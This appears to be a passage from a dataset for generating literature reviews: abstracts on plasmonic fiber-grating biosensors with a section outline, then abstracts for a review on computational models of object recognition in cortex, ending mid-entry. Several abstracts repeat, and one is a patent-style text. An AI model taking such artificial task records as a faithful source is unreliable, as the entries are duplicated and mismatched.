(refractive index unit) with a figure of merit of more than 2000 and intrinsic temperature self-compensation. This kind of sensor is particularly relevant to in situ operation. --- paper_title: Plasmonic structure: fiber grating formed by gold nanorods on a tapered fiber. paper_content: The authors demonstrated the fabrication of a fiber Bragg grating-like plasmonic nanostructure on the surface of a tapered optical fiber using gold nanorods (GNRs). A multimode optical fiber with core and cladding diameters of 105 and 125 μm, respectively, was used to make a tapered fiber using a dynamic etching process. The tip diameter was ∼100 nm. Light from a laser was coupled to the untapered end of the fiber, which produced a strong evanescent field around the tapered section of the fiber. The gradient force due to the evanescent field trapped the GNRs on the surface of the tapered fiber. The authors explored possible causes of the GNR distribution. The plasmonic structure will be a good candidate for sensing based on surface enhanced Raman scattering. --- paper_title: Fiber-optic anemometer based on single-walled carbon nanotube coated tilted fiber Bragg grating paper_content: In this work, a novel and simple optical fiber hot-wire anemometer based on single-walled carbon nanotubes (SWCNTs) coated tilted fiber Bragg grating (TFBG) is proposed and demonstrated. For the hot-wire wind speed sensor design, TFBG is an ideal in-fiber sensing structure due to its unique features. It is utilized as both light coupling and temperature sensing element without using any geometry-modified or uncommon fiber, which simplifies the sensor structure. To further enhance the thermal conversion capability, SWCNTs are coated on the surface of the TFBG instead of traditional metallic materials, which have excellent thermal characteristics. When a laser light is pumped into the sensor, the pump light propagating in the core will be easily coupled into cladding of the fiber via the TFBG and strongly absorbed by the SWCNTs thin film. This absorption acts like a hot-wire raising the local temperature of the fiber, which is accurately detected by the TFBG resonance shift. In the experiments, the sensor’s performances were investigated and controlled by adjusting the inherent angle of the TFBG, the thickness of SWCNTs film, and the input power of the pump laser. It was demonstrated that the developed anemometer exhibited significant light absorption efficiency up to 93%, and the maximum temperature of the local area on the fiber was heated up to 146.1°C under the relatively low pump power of 97.76 mW. The sensitivity of −0.3667 nm/(m/s) at wind speed of 1.0 m/s was measured with the selected 12° TFBG and 1.6 μm film. --- paper_title: Oxides and nitrides as alternative plasmonic materials in the optical range [Invited] paper_content: As alternatives to conventional metals, new plasmonic materials offer many advantages in the rapidly growing fields of plasmonics and metamaterials. These advantages include low intrinsic loss, semiconductor-based design, compatibility with standard nanofabrication processes, tunability, and others. Transparent conducting oxides such as Al:ZnO, Ga:ZnO and indium-tin-oxide (ITO) enable many high-performance metamaterial devices operating in the near-IR. Transition-metal nitrides such as TiN or ZrN can be substitutes for conventional metals in the visible frequencies. In this paper we provide the details of fabrication and characterization of these new materials and discuss their suitability for a number of metamaterial and plasmonic applications. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Optical bio-sensing devices based on etched fiber Bragg gratings coated with carbon nanotubes and graphene oxide along with a specific dendrimer paper_content: We demonstrate that etched fiber Bragg gratings (eFBGs) coated with single walled carbon nanotubes (SWNTs) and graphene oxide (GO) are highly sensitive and accurate biochemical sensors. Here, for detecting protein concanavalin A (Con A), mannose-functionalized poly(propyl ether imine) (PETIM) dendrimers (DMs) have been attached to the SWNTs (or GO) coated on the surface modified eFBG. The dendrimers act as multivalent ligands, having specificity to detect lectin Con A. The specificity of the sensor is shown by a much weaker response (factor of similar to 2500 for the SWNT and similar to 2000 for the GO coated eFBG) to detect non specific lectin peanut agglutinin. DM molecules functionalized GO coated eFBG sensors showed excellent specificity to Con A even in the presence of excess amount of an interfering protein bovine serum albumin. The shift in the Bragg wavelength (Delta lambda(B)) with respect to the lambda(B) values of SWNT (or GO)-DM coated eFBG for various concentrations of lectin follows Langmuir type adsorption isotherm, giving an affinity constant of similar to 4 x 10(7) M-1 for SWNTs coated eFBG and similar to 3 x 10(8) M-1 for the GO coated eFBG. (C) 2014 Elsevier B.V. All rights reserved. --- paper_title: Plasmonic nanoshell functionalized etched fiber Bragg gratings for highly sensitive refractive index measurements paper_content: A novel fiber optical refractive index sensor based on gold nanoshells immobilized on the surface of an etched single-mode fiber including a Bragg grating is demonstrated. The nanoparticle coating induces refractive index dependent waveguide losses, because of the variation of the evanescently guided part of the light. Hence the amplitude of the Bragg reflection is highly sensitive to refractive index changes of the surrounding medium. The nanoshell functionalized fiber optical refractive index sensor works in reflectance mode, is suitable for chemical and biochemical sensing, and shows an intensity dependency of 4400% per refractive index unit in the refractive index range between 1.333 and 1.346. Furthermore, the physical length of the sensor is smaller than 3 mm with a diameter of 6 μm, and therefore offers the possibility of a localized refractive index measurement. ---
Title: Plasmonic Optical Fiber-Grating Immunosensing: A Review Section 1: Introduction Description 1: Introduce the basic concepts of biosensors, label-free optical biosensors, and their applications. Explain the mechanism of surface plasmon resonance (SPR) and emphasize the advantages of optical fiber-based SPR sensors over traditional configurations. Section 2: Review of Grating Configurations Used for SPR Excitation Description 2: Review the different grating configurations used for SPR excitation in optical fibers, including their operating principles and practical benefits. Section 3: Unclad Uniform Fiber Bragg Gratings Description 3: Describe unclad uniform fiber Bragg gratings (FBGs), their structure, production techniques, sensitivity to temperature and axial strain, and their application in SPR excitation. Section 4: Tilted-Fiber Bragg Gratings Description 4: Discuss tilted-fiber Bragg gratings (TFBGs), their unique features, light coupling mechanisms, and their application for refractometry through surrounding index changes. Section 5: Excessively Tilted Fiber Gratings Description 5: Explain excessively tilted fiber gratings (ETFGs), their behavior, production techniques, and their effectiveness in SPR-based sensing. Section 6: Eccentric Fiber Bragg Gratings Description 6: Cover eccentric fiber Bragg gratings (EFBGs), focusing on their structure, production methods, and sensitivity to surrounding refractive index changes, comparing them to TFBGs. Section 7: Long-Period Fiber Gratings Description 7: Detail long-period fiber gratings (LPFGs), their role as forward-going cladding mode couplers, and their sensitivity to surrounding refractive index changes. Section 8: Additional Considerations Description 8: Discuss other important considerations in the development of SPR optical fiber sensors, including metal film coatings, nanoparticles, and the figure of merit (FOM) in sensor performance. Section 9: Interactions with Metals and Surface Biochemical Functionalization Description 9: Elaborate on the methods of metal layer deposition on fiber gratings and the subsequent surface functionalization for biosensing applications. Section 10: Interrogation of Plasmonic Fiber-Grating (Bio)chemical Sensors Description 10: Evaluate different techniques for interrogating plasmonic fiber-grating chemical and biochemical sensors, including spectral and intensity interrogation methods. Section 11: Spectrometer-Based Interrogation Description 11: Explain the principles and setups for spectrometer-based interrogation of plasmonic FBG sensors, and techniques for enhancing measurement resolution. Section 12: Intensity or Optical Power-Based Interrogation Description 12: Discuss intensity or optical power-based interrogation techniques and their practical implementation for plasmonic FBG sensors. Section 13: Other Interrogation Techniques Description 13: Explore alternative interrogation techniques using polarization analysis and phase measurement, highlighting their advantages in specific applications. Section 14: Protein and Cell Detection and Quantification Description 14: Summarize experimental demonstrations of fiber gratings used for protein and cell detection, focusing on their performance and practical implementations. Section 15: Overview of Plasmonic Fiber-Grating Immunosensors Description 15: Present a general survey of recent literature on plasmonic fiber-grating immunosensors, including their detection limits and performance indicators. Section 16: Detection of Cancer Biomarkers Description 16: Outline the steps involved in developing plasmonic fiber-grating immunosensors for cancer biomarker detection, emphasizing practical implementation in clinical diagnostics. Section 17: Conclusions Description 17: Conclude the review by summarizing the current state of fiber grating-based SPR immunosensors, their potential clinical applications, and future research directions.
Computational Models of Object Recognition in Cortex: A Review
14
--- paper_title: View-based Models of 3D Object Recognition: Invariance to Imaging Transformations paper_content: This report describes the main features of a view-based model of object recognition. The model does not attempt to account for specific cortical structures; it tries to capture general properties to be expected in a biological architecture for object recognition. The basic module is a regularization network (RBF-like; see Poggio and Girosi, 1989; Poggio, 1990) in which each of the hidden units is broadly tuned to a specific view of the object to be recognized. The network output, which may be largely view independent, is first described in terms of some simple simulations. The following refinements and details of the basic module are then discussed: (1) some of the units may represent only components of views of the object--the optimal stimulus for the unit, its "center," is effectively a complex feature; (2) the units' properties are consistent with the usual description of cortical neurons as tuned to multidimensional optimal stimuli and may be realized in terms of plausible biophysical mechanisms; (3) in learning to recognize new objects, preexisting centers may be used and modified, but also new centers may be created incrementally so as to provide maximal view invariance; (4) modules are part of a hierarchical structure--the output of a network may be used as one of the inputs to another, in this way synthesizing increasingly complex features and templates; (5) in several recognition tasks, in particular at the basic level, a single center using view-invariant features may be sufficient. --- paper_title: Representation And Recognition In Vision paper_content: Researchers have long sought to understand what the brain does when we see an object, what two people have in common when they see the same object, and what a "seeing" machine would need to have in common with a human visual system. Recent neurobiological and computational advances in the study of vision have now brought us close to answering these and other questions about representation. In Representation and Recognition in Vision, Shimon Edelman bases a comprehensive approach to visual representation on the notion of correspondence between proximal (internal) and distal similarities in objects. This leads to a computationally feasible and formally veridical representation of distal objects that addresses the needs of shape categorization and can be used to derive models of perceived similarity. Edelman first discusses the representational needs of various visual recognition tasks, and surveys current theories of representation in this context. He then develops a theory of representation that is related to Shepard's notion of second-order isomorphism between representations and their targets. Edelman goes beyond Shepard by specifying the conditions under which the representations can be made formally veridical. Edelman assesses his theory's performance in identification and categorization of 3D shapes and examines it in light of psychological and neurobiological data concerning the object-processing stream in primate vision. He also discusses the connections between his theory and other efforts to understand representation in the brain. --- paper_title: High-Level Vision: Object Recognition and Visual Cognition paper_content: Object recognition: shape-based recognition what is recognition? why object recognition is difficult. Approaches to object recognition: invariant properties and feature spaces parts and structural descriptions the alignment approach which is the correct approach?. The alignment of pictorial descriptions: using corresponding features the use of multiple models for 3-D objects aligning pictorial descriptions transforming the image or the models? before and after alignment. The alignment of smooth bounding contours: the curvate method accuracy of the curvature method empirical testing. Recognition by the combination of views: modelling objects by view combinations objects with sharp edges using two views only using a single view the use of depth values summary of the basic scheme objects with smooth boundaries recognition by image combinations extensions to the view-combination scheme psychophysical and physiological evidence interim conclusions: recognition by multiple views. Classifications: classification and identification the role of object classification class-based processing using class prototypes pictorial classification evidence from psychology and biology are classes in the world or in our head? the organization of recognition memory. Image and model correspondence: feature correspondence contour matching correspondence-less methods correspondence processes in human vision model construction compensating for illumination changes. Segmentation and saliency: is segmentation feasible? bottom-up and top-down segmentation extracting globally salient structures saliency, selection, and completion what can bottom-up segmentation achieve? Visual cognition and visual routines: perceiving "inside" and "outside" spatial analysis by visual routines conclusions and open problems the elemental operations the assembly and storage of routines routines and recognition. Sequence seeking and counter streams - a model for visual cortex: the sequence-seeking scheme biological embodiment summary. Appendices: alignment by feature the curvature method errors of the curvature method locally affine matching definitions. --- paper_title: Visual Object Recognition paper_content: Technical solutions are described for training an object-recognition neural network that identifies an object in a computer-readable image. An example method includes assigning a first neural network for determining a visual alignment model of the images for determining a normalized alignment of the object. The method further includes assigning a second neural network for determining a visual representation model of the images for recognizing the object. The method further includes determining the visual alignment model by training the first neural network and determining the visual representation model by training the second neural network independent of the first. The method further includes determining a combined object recognition model by training a combination of the first neural network and the second neural network. The method further includes recognizing the object in the image based on the combined object recognition model by passing the image through each of the neural networks. --- paper_title: High-Level Vision: Object Recognition and Visual Cognition paper_content: Object recognition: shape-based recognition what is recognition? why object recognition is difficult. Approaches to object recognition: invariant properties and feature spaces parts and structural descriptions the alignment approach which is the correct approach?. The alignment of pictorial descriptions: using corresponding features the use of multiple models for 3-D objects aligning pictorial descriptions transforming the image or the models? before and after alignment. The alignment of smooth bounding contours: the curvate method accuracy of the curvature method empirical testing. Recognition by the combination of views: modelling objects by view combinations objects with sharp edges using two views only using a single view the use of depth values summary of the basic scheme objects with smooth boundaries recognition by image combinations extensions to the view-combination scheme psychophysical and physiological evidence interim conclusions: recognition by multiple views. Classifications: classification and identification the role of object classification class-based processing using class prototypes pictorial classification evidence from psychology and biology are classes in the world or in our head? the organization of recognition memory. Image and model correspondence: feature correspondence contour matching correspondence-less methods correspondence processes in human vision model construction compensating for illumination changes. Segmentation and saliency: is segmentation feasible? bottom-up and top-down segmentation extracting globally salient structures saliency, selection, and completion what can bottom-up segmentation achieve? Visual cognition and visual routines: perceiving "inside" and "outside" spatial analysis by visual routines conclusions and open problems the elemental operations the assembly and storage of routines routines and recognition. Sequence seeking and counter streams - a model for visual cortex: the sequence-seeking scheme biological embodiment summary. Appendices: alignment by feature the curvature method errors of the curvature method locally affine matching definitions. --- paper_title: A Computational Model for Visual Selection paper_content: We propose a computational model for detecting and localizing instances from an object class in static gray-level images. We divide detection into visual selection and final classification, concentrating on the former: drastically reducing the number of candidate regions that require further, usually more intensive, processing, but with a minimum of computation and missed detections. Bottom-up processing is based on local groupings of edge fragments constrained by loose geometrical relationships. They have no a priori semantic or geometric interpretation. The role of training is to select special groupings that are moderately likely at certain places on the object but rate in the background. We show that the statistics in both populations are stable. The candidate regions are those that contain global arrangements of several local groupings. Whereas our model was not conceived to explain brain functions, it does cohere with evidence about the functions of neurons in V1 and V2, such as responses to coarse or incomplete patterns (e.g., illusory contours) and to scale and translation invariance in IT. Finally, the algorithm is applied to face and symbol detection. --- paper_title: Dynamic binding in a neural network for shape recognition. paper_content: Given a single view of an object, humans can readily recognize that object from other views that preserve the parts in the original view. Empirical evidence suggests that this capacity reflects the activation of a viewpoint-invariant structural description specifying the object's parts and the relations among them. This article presents a neural network that generates such a description. Structural description is made possible through a solution to the dynamic binding problem: Temporary conjunctions of attributes (parts and relations) are represented by synchronized oscillatory activity among independent units representing those attributes --- paper_title: Recognition-by-components: A theory of human image understanding paper_content: The perceptual recognition of objects is conceptualized to be a process in which the image of the input is segmented at regions of deep concavity into an arrangement of simple geometric components, such as blocks, cylinders, wedges, and cones. The fundamental assumption of the proposed theory, recognition-by-components (RBC), is that a modest set of generalized-cone components, called geons (N £ 36), can be derived from contrasts of five readily detectable properties of edges in a two-dimensiona l image: curvature, collinearity, symmetry, parallelism, and cotermination. The detection of these properties is generally invariant over viewing position an$ image quality and consequently allows robust object perception when the image is projected from a novel viewpoint or is degraded. RBC thus provides a principled account of the heretofore undecided relation between the classic principles of perceptual organization and pattern recognition: The constraints toward regularization (Pragnanz) characterize not the complete object but the object's components. Representational power derives from an allowance of free combinations of the geons. A Principle of Componential Recovery can account for the major phenomena of object recognition: If an arrangement of two or three geons can be recovered from the input, objects can be quickly recognized even when they are occluded, novel, rotated in depth, or extensively degraded. The results from experiments on the perception of briefly presented pictures by human observers provide empirical support for the theory. Any single object can project an infinity of image configurations to the retina. The orientation of the object to the viewer can vary continuously, each giving rise to a different two-dimensional projection. The object can be occluded by other objects or texture fields, as when viewed behind foliage. The object need not be presented as a full-colored textured image but instead can be a simplified line drawing. Moreover, the object can even be missing some of its parts or be a novel exemplar of its particular category. But it is only with rare exceptions that an image fails to be rapidly and readily classified, either as an instance of a familiar object category or as an instance that cannot be so classified (itself a form of classification). --- paper_title: A Computational Model for Visual Selection paper_content: We propose a computational model for detecting and localizing instances from an object class in static gray-level images. We divide detection into visual selection and final classification, concentrating on the former: drastically reducing the number of candidate regions that require further, usually more intensive, processing, but with a minimum of computation and missed detections. Bottom-up processing is based on local groupings of edge fragments constrained by loose geometrical relationships. They have no a priori semantic or geometric interpretation. The role of training is to select special groupings that are moderately likely at certain places on the object but rate in the background. We show that the statistics in both populations are stable. The candidate regions are those that contain global arrangements of several local groupings. Whereas our model was not conceived to explain brain functions, it does cohere with evidence about the functions of neurons in V1 and V2, such as responses to coarse or incomplete patterns (e.g., illusory contours) and to scale and translation invariance in IT. Finally, the algorithm is applied to face and symbol detection. --- paper_title: High-Level Vision: Object Recognition and Visual Cognition paper_content: Object recognition: shape-based recognition what is recognition? why object recognition is difficult. Approaches to object recognition: invariant properties and feature spaces parts and structural descriptions the alignment approach which is the correct approach?. The alignment of pictorial descriptions: using corresponding features the use of multiple models for 3-D objects aligning pictorial descriptions transforming the image or the models? before and after alignment. The alignment of smooth bounding contours: the curvate method accuracy of the curvature method empirical testing. Recognition by the combination of views: modelling objects by view combinations objects with sharp edges using two views only using a single view the use of depth values summary of the basic scheme objects with smooth boundaries recognition by image combinations extensions to the view-combination scheme psychophysical and physiological evidence interim conclusions: recognition by multiple views. Classifications: classification and identification the role of object classification class-based processing using class prototypes pictorial classification evidence from psychology and biology are classes in the world or in our head? the organization of recognition memory. Image and model correspondence: feature correspondence contour matching correspondence-less methods correspondence processes in human vision model construction compensating for illumination changes. Segmentation and saliency: is segmentation feasible? bottom-up and top-down segmentation extracting globally salient structures saliency, selection, and completion what can bottom-up segmentation achieve? Visual cognition and visual routines: perceiving "inside" and "outside" spatial analysis by visual routines conclusions and open problems the elemental operations the assembly and storage of routines routines and recognition. Sequence seeking and counter streams - a model for visual cortex: the sequence-seeking scheme biological embodiment summary. Appendices: alignment by feature the curvature method errors of the curvature method locally affine matching definitions. --- paper_title: Representation and recognition of the spatial organization of three-dimensional shapes paper_content: The human visual process can be studied by examining the computational problems associated with deriving useful information from retinal images. In this paper, we apply this approach to the problem of representing three-dimensional shapes for the purpose of recognition. 1. Three criteria, accessibility, scope and uniqueness, and stability and sensitivity, are presented for judging the usefulness of a representation for shape recognition. 2. Three aspects of a representation9s design are considered, (i) the representation9s coordinate system, (ii) its primitives, which are the primary units of shape information used in the representation, and (iii) the organization the representation imposes on the information in its descriptions. 3. In terms of these design issues and the criteria presented, a shape representation for recognition should: (i) use an object-centred coordinate system, (ii) include volumetric primitives of varied sizes, and (iii) have a modular organization. A representation based on a shape9s natural axes (for example the axes identified by a stick figure) follows directly from these choices. 4. The basic process for deriving a shape description in this representation must involve: (i) a means for identifying the natural axes of a shape in its image and (ii) a mechanism for transforming viewer-centred axis specifications to specifications in an object-centred coordinate system. 5. Shape recognition involves: (i) a collection of stored shape descriptions, and (ii) various indexes into the collection that allow a newly derived description to be associated with an appropriate stored description. The most important of these indexes allows shape recognition to proceed conservatively from the general to the specific based on the specificity of the information available from the image. 6. New constraints supplied by a conservative recognition process can be used to extract more information from the image. A relaxation process for carrying out this constraint analysis is described. --- paper_title: Dynamic Model of Visual Recognition Predicts Neural Response Properties in the Visual Cortex paper_content: Recent neurophysiological experiments appear to indicate that the responses of visual cortical neurons in a monkey freely viewing a natural scene can sometimes differ substantially from those obtained when the same image subregions are flashed during a conventional fixation task. These new findings attain significance from the fact that neurophysiological research in the past has been based predominantly on cell recordings obtained during fixation tasks, under the assumption that these data would be useful in predicting responses in more general situations. We describe a hierarchical model of visual memory that reconciles the two differing experimental results mentioned above by predicting neural responses in both fixating and free-viewing conditions. The model dynamically combines input-driven bottom-up signals with expectation-driven top-down signals to achieve optimal estimation of current state using a Kalman filter based framework. The architecture of the model posits a role for the reciprocal connections between adjoining visual cortical areas in determining neural response properties. --- paper_title: Neocognitron: A self-organizing neural network model for a mechanism of pattern recognition unaffected by shift in position paper_content: A neural network model for a mechanism of visual pattern recognition is proposed in this paper. The network is self-organized by “learning without a teacher”, and acquires an ability to recognize stimulus patterns based on the geometrical similarity (Gestalt) of their shapes without affected by their positions. This network is given a nickname “neocognitron”. After completion of self-organization, the network has a structure similar to the hierarchy model of the visual nervous system proposed by Hubel and Wiesel. The network consits of an input layer (photoreceptor array) followed by a cascade connection of a number of modular structures, each of which is composed of two layers of cells connected in a cascade. The first layer of each module consists of “S-cells”, which show characteristics similar to simple cells or lower order hypercomplex cells, and the second layer consists of “C-cells” similar to complex cells or higher order hypercomplex cells. The afferent synapses to each S-cell have plasticity and are modifiable. The network has an ability of unsupervised learning: We do not need any “teacher” during the process of self-organization, and it is only needed to present a set of stimulus patterns repeatedly to the input layer of the network. The network has been simulated on a digital computer. After repetitive presentation of a set of stimulus patterns, each stimulus pattern has become to elicit an output only from one of the C-cell of the last layer, and conversely, this C-cell has become selectively responsive only to that stimulus pattern. That is, none of the C-cells of the last layer responds to more than one stimulus pattern. The response of the C-cells of the last layer is not affected by the pattern's position at all. Neither is it affected by a small change in shape nor in size of the stimulus pattern. --- paper_title: Properties of Simulated Neurons from a Model of Primate Inferior Temporal Cortex paper_content: The physiological properties of neurons in inferior temporal (IT) cortex of the macaque monkey suggest that this cortical area plays a major role in visual pattern recognition. Based on the properties of IT, and one of its major sources of input, V4, a model is proposed that can account for some of the shape recognition properties of IT neurons including selectivity for complex visual stimuli and tolerance to the size and location of the stimuli. The model is composed of three components. First, stimulus location tolerance is modeled after the complex-cell-like properties observed in some V4 neurons. The second component of the model is an attentionally controlled scaling mechanism that facilitates size-invariant shape recognition. The transition from edge orientation-selective neurons in V4 to neurons with more complicated stimulus preference in IT is explained by the third component of the model, a competitive learning mechanism. Single-unit analysis of receptive field properties, stimulus selectivity, and stimulus size and position tolerance was performed on "neurons" from the simulation. Comparison of results from the simulation and a study of actual IT neurons shows that the set of mechanisms incorporated into the simulation is sufficient to emulate the physiological data. --- paper_title: SEEMORE: Combining Color, Shape, and Texture Histogramming in a Neurally Inspired Approach to Visual Object Recognition paper_content: Severe architectural and timing constraints within the primate visual system support the conjecture that the early phase of object recognition in the brain is based on a feedforward feature-extraction hierarchy. To assess the plausibility of this conjecture in an engineering context, a difficult three-dimensional object recognition domain was developed to challenge a pure feedforward, receptive-field based recognition model called SEEMORE. SEEMORE is based on 102 viewpoint-invariant nonlinear filters that as a group are sensitive to contour, texture, and color cues. The visual domain consists of 100 real objects of many different types, including rigid (shovel), nonrigid (telephone cord), and statistical (maple leaf cluster) objects and photographs of complex scenes. Objects were in dividually presented in color video images under normal room lighting conditions. Based on 12 to 36 training views, SEEMORE was required to recognize unnormalized test views of objects that could vary in position, orientation ... --- paper_title: News On Views: Pandemonium Revisited paper_content: How do we recognize objects from different viewpoints? A new model, based on the known properties of cortical neurons, may help resolve this long-standing debate. --- paper_title: A Neurobiological Model of Visual Attention and Invariant Pattern Recognition Based on Dynamic Routing of Information paper_content: We present a biologically plausible model of an attentional mechanism for forming position- and scale-invariant representations of objects in the visual world. The model relies on a set of control neurons to dynamically modify the synaptic strengths of intracortical connections so that information from a windowed region of primary visual cortex (V1) is selectively routed to higher cortical areas. Local spatial relationships (i.e., topography) within the attentional window are preserved as information is routed through the cortex. This enables attended objects to be represented in higher cortical areas within an object-centered reference frame that is position and scale invariant. We hypothesize that the pulvinar may provide the control signals for routing information through the cortex. The dynamics of the control neurons are governed by simple differential equations that could be realized by neurobiologically plausible circuits. In preattentive mode, the control neurons receive their input from a low-level “saliency map” representing potentially interesting regions of a scene. During the pattern recognition phase, control neurons are driven by the interaction between top-down (memory) and bottom-up (retinal input) sources. The model respects key neurophysiological, neuroanatomical, and psychophysical data relating to attention, and it makes a variety of experimentally testable predictions. --- paper_title: Neurophysiology of shape processing paper_content: Recent physiological findings are reviewed and synthesized into a model of shape processing and object recognition. Gestalt laws (e.g. good continuation, closure) and ‘non-accidental’ image properties (e.g. colinear terminating lines) are resolved in prestriate visual cortex, (areas V2 and V3) to support the extraction of 2D shape boundaries. Processing of shape continues along a ventral route through inferior temporal (IT) cortex where a vast catalogue of 2D shape primitives is established. Each catalogue entry is size-specific (±0.5 log scale unit) and orientation-specific (±45°), but can generalize over position (±150 degree2). Several shape components are used to activate representations of the approximate appearance of one object type at one view, orientation and size. Subsequent generalization, first over orientation and size, then over view, and finally over object sub-component, is achieved in the anterior temporal cortex by combining descriptions of the same object from different orientations and views, through associative learning. This scheme provides a route to 3D object recognition through 2D shape description and reduces the problem of perceptual invariance to a series of independent analyses with an associative link established between the outputs. The system relies on parallel processing with computations performed in a series of hierarchical steps with relatively simple operations at each stage. --- paper_title: Shifter circuits: a computational strategy for dynamic aspects of visual processing paper_content: Abstract ::: We propose a general strategy for dynamic control of information flow between arrays of neurons at different levels of the visual pathway, starting in the lateral geniculate nucleus and the geniculorecipient layers of cortical area V1. This strategy can be used for resolving computational problems arising in the domains of stereopsis, directed visual attention, and the perception of moving images. In each of these situations, some means of dynamically controlling how retinal outputs map onto higher-level targets is desirable--in order to achieve binocular fusion, to allow shifts of the focus of attention, and to prevent blurring of moving images. The proposed solution involves what we term "shifter circuits," which allow for dynamic shifts in the relative alignment of input and output arrays without loss of local spatial relationships. The shifts are produced in increments along a succession of relay stages that are linked by diverging excitatory inputs. The direction of shift is controlled at each stage by inhibitory neurons that selectively suppress appropriate sets of ascending inputs. The shifter hypothesis is consistent with available anatomical and physiological evidence on the organization of the primate visual pathway, and it offers a sensible explanation for a variety of otherwise puzzling facts, such as the plethora of cells in the geniculorecipient layers of V1. --- paper_title: Visual properties of neurons in a polysensory area in superior temporal sulcus of the macaque. paper_content: 1. We recorded from single neurons in the dorsal bank and fundus of the anterior portion of the superior temporal sulcus, an area we term the superior temporal polysensory area (STP). Five macaques were studied under anesthesia ( N20) and immobilization in repeated recording sessions. 2. Almost all of the neurons were visually responsive, and over half responded to more than one sensory modality; 21% responded to visual and auditory stimuli, 17% responded to visual and somesthetic stimuli, 17% were trimodal, and 41% were exclusively visual. 3. Almost all the visual receptive fields extended into both visual half-fields, and the majority approached the size of the visual field of the monkey, including both monocular crescents. Somesthetic receptive fields were also bilateral and usually included most of the body surface. 4. Virtually all neurons responded better to moving visual stimuli than to stationary visual stimuli, and almost half were sensitive to the direction of movement. Several classes of directional neurons were found, including a) neurons selective for a single direction of movement throughout their receptive field, b) neurons selective for directions of movement radially symmetric about the center of gaze, and c) neurons selective for movement in depth. 5. The majority of neurons (70%) had little or no preference for stimulus size, shape, orientation, or contrast. The minority (30%) responded best to particular stimuli. Some of these appeared to be selective for faces. 6. The properties of most STP neurons, such as large receptive fields, sensitivity to movement, insensitivity to form, and polymodal responsiveness, suggest that STP is more involved in orientation and spatial functions than in pattern recognition. --- paper_title: Rotating objects to recognize them: A case study on the role of viewpoint dependency in the recognition of three-dimensional objects. paper_content: Successful object recognition is essential for finding food, identifying kin, and avoiding danger, as well as many other adaptive behaviors. To accomplish this feat, the visual system must reconstruct 3-D interpretations from 2-D “snapshots” falling on the retina. Theories of recognition address this process by focusing on the question of how object representations are encoded with respect to viewpoint. Although empirical evidence has been equivocal on this question, a growing body of surprising results, including those obtained in the experiments presented in this case study, indicates that recognition is often viewpoint dependent. Such findings reveal a prominent role for viewpointdependent mechanisms and provide support for themultiple-views approach, in which objects are encoded as a set of view-specific representations that are matched to percepts using normalization procedures. --- paper_title: Activity of neurones in the inferotemporal cortex of the alert monkey paper_content: The activity of neurones in the inferotemporal cortex of the alert rhesus monkey was recorded while the monkey was shown visual stimuli, which included both food and non-food objects for comparison with the activity of neurones in the lateral hypothalamus and substantia innominata. In the anteroventral part of the inferotemporal cortex, neurones were found with visual responses which were sustained while the animal looked at the appropriate visual stimuli. The latency of the responses was 100 msec or more. The majority (96/142 or 68%) of these neurones responded more strongly to some stimuli than to others. These units usually had different responses when objects were shown from different views, and physical factors such as shape, size, orientation, colour and texture appeared to account for the responses of some of these units. Association of visual stimuli with a food reward (glucose solution) or an aversive taste (5% saline solution) did not affect the magnitude of the responses of the neurones to the stimuli either during the learning or after the period of learning. Nor did feeding the monkey to satiety affect the responses of the neurones to their effective stimuli. --- paper_title: Inferotemporal Cortex and Object Vision paper_content: Cells in area TE of the inferotemporal cortex of the monkey brain selectively respond to various moderately complex object features, and those that cluster in a columnar region that runs perpendicular to the cortical surface respond to similar features. Although cells within a column respond to similar features, their selectivity is not necessarily identical. The data of optical imaging in 'E have suggested that the borders between neighboring columns are not discrete; a continuous mapping of complex feature space within a larger region contains several partially overlapped columns. This continuous mapping may be used for various computations, such as production of the image of the object at different viewing angles, illumination conditions. and articulation poses. --- paper_title: Face-Selective Cells in the Temporal Cortex of Monkeys paper_content: The notion of a neuron that responds selectively to the image of a particular complex object has been controversial ever since Gross and his colleagues reported neurons in the temporal cortex of monkeys that were selective for the sight of a monkey's hand (Gross, Rocha-Miranda, & Bender, 1972). Since that time, evidence has mounted for neurons in the temporal lobe that respond selectively to faces. The present paper presents a critical analysis of the evidence for face neurons and discusses the implications of these neurons for models of object recognition. The paper also presents some possible reasons for the evolution of face neurons and suggests some analogies with the development of language in humans. --- paper_title: Psychophysical support for a two-dimensional view interpolation theory of object recognition. paper_content: Does the human brain represent objects for recognition by storing a series of two-dimensional snapshots, or are the object models, in some sense, three-dimensional analogs of the objects they represent? One way to address this question is to explore the ability of the human visual system to generalize recognition from familiar to unfamiliar views of three-dimensional objects. Three recently proposed theories of object recognition--viewpoint normalization or alignment of three-dimensional models [Ullman, S. (1989) Cognition 32, 193-254], linear combination of two-dimensional views [Ullman, S. & Basri, R. (1990) Recognition by Linear Combinations of Models (Artificial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge), A. I. Memo No. 1152], and view approximation [Poggio, T. & Edelman, S. (1990) Nature (London) 343, 263-266]--predict different patterns of generalization to unfamiliar views. We have exploited the conflicting predictions to test the three theories directly in a psychophysical experiment involving computer-generated three-dimensional objects. Our results suggest that the human visual system is better described as recognizing these objects by two-dimensional view interpolation than by alignment or other methods that rely on object-centered three-dimensional models. --- paper_title: Visual Object Recognition paper_content: Technical solutions are described for training an object-recognition neural network that identifies an object in a computer-readable image. An example method includes assigning a first neural network for determining a visual alignment model of the images for determining a normalized alignment of the object. The method further includes assigning a second neural network for determining a visual representation model of the images for recognizing the object. The method further includes determining the visual alignment model by training the first neural network and determining the visual representation model by training the second neural network independent of the first. The method further includes determining a combined object recognition model by training a combination of the first neural network and the second neural network. The method further includes recognizing the object in the image based on the combined object recognition model by passing the image through each of the neural networks. --- paper_title: Shape representation in the inferior temporal cortex of monkeys 